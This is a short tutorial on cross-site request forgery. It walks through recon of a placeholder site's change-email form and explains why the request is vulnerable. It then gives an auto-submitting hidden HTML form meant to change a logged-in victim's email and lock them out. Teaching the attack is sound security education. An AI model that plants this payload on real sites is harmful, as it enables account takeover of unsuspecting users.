An Introduction to CSRF Attacks

Situation

We have a web application that’s vulnerable to CSRF attacks. What we want to do is to create a malicious HTML snippet. When an arbitrary logged-in user opens this page, it should auto-submit a form on their behalf, using their own credentials (their session cookie), which the browser attaches automatically.

More specifically, the goal is to change a user’s email, and lock them out of the site.

Recon

We want to target the “Change Email” form, so let’s do some recon first by logging into our account to check things out.

After logging in, we can see the “Change Email” page on https://target-site.com/email/change-email. The specific form looks like this:

HTTP/1.1 200 OK
...
Content-Length: 3069

<!DOCTYPE html>
<html>
...
    <form class="login-form" action="/email/change-email" method="POST">
        <label>Email</label>
        <input required type="email" name="email" value="">
        <button class='button' type='submit'> Update email </button>
    </form>
...

Let’s submit this form with our account, then intercept it to see what’s inside:

POST /email/change-email HTTP/1.1
Host: target-host.com
...
Cookie: session=4TPtiDWqNK0xcLA3anvevopNojTU5zTe

email=hello%40mail.com

We can see that it’s vulnerable to CSRF attacks because:

  1. There is a specific state-changing action, POST /email/change-email
  2. It’s a cookie-based request: the only authentication is the session cookie, which the browser sends automatically with any request to the site
  3. The request parameters are predictable; in this case it’s just email, with no unpredictable anti-CSRF token alongside it

Exploit

Now that we have all the pieces, let’s craft the exploit. We want to write a similar form that uses a hidden input for the email value and auto-submits as soon as the page loads, like this one:

<html>
  <body>
    <form action="https://target-host.com/email/change-email" method="POST">
      <input type="hidden" name="email" value="your_new_email@mail.com" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

That’s it! We can verify that it does the job by opening the page ourselves while logged in, then checking that our account’s email has changed to your_new_email@mail.com.